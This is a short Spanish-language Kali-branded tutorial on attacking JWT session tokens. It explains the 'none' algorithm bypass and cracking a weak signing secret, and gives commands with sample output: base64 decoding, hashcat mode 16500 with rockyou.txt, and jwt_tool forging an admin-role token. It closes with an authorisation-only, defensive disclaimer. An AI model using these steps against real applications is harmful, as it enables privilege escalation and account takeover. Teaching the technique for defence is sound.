KALI
Ataca tokens JWT
Los JWT son los tokens de sesión de las apps modernas, y tienen fallos clásicos.
Primero decodificas el token, que va en base64, para ver qué guarda; a veces trae el rol de usuario. Si el servidor no valida bien la firma, puedes cambiar el algoritmo a none y quitarla, o crackear el secreto de firma con hashcat si es débil.
Con eso, te fabricas un token de administrador. Nunca confíes en un JWT sin verificar su firma con un secreto fuerte.
# los comandos
kali@kali:~$ echo TOKEN | cut -d. -f2 | base64 -dcopiar{"user":"juan","role":"user"}
kali@kali:~$ hashcat -m 16500 token.jwt rockyou.txtcopiartoken:secret123 <- firma débil
kali@kali:~$ jwt_tool TOKEN -T -S hs256 -p 'secret123'copiarrole: admin (token forjado)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.